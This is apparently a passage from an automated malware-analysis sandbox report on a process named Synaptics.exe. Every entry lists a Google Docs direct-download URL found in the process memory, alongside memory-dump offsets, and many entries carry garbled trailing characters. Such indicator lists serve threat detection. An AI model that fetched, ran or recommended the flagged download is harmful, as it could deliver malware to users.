                                Source: Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984057257.000000000E8B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3017903336.000000001D6FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3070010239.000000003B051000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3089527859.000000003DE4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984057257.000000000E8B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#l
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984057257.000000000E8B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%Te
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                                Source: Synaptics.exe, 00000002.00000002.2959950848.000000000532C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(8
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(9
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)E:
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)P
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)l
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-0ab
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-D6
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Secu
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Ver
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-w
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..(
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..4
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.g
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.gl
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.m
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.n
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.np;
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.you%8Z
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download//A
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/_/Dr
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/vk%/
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.00000000005BA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0(
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1Tq
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download20z
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download28=
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download29w
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984057257.000000000E8B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download30
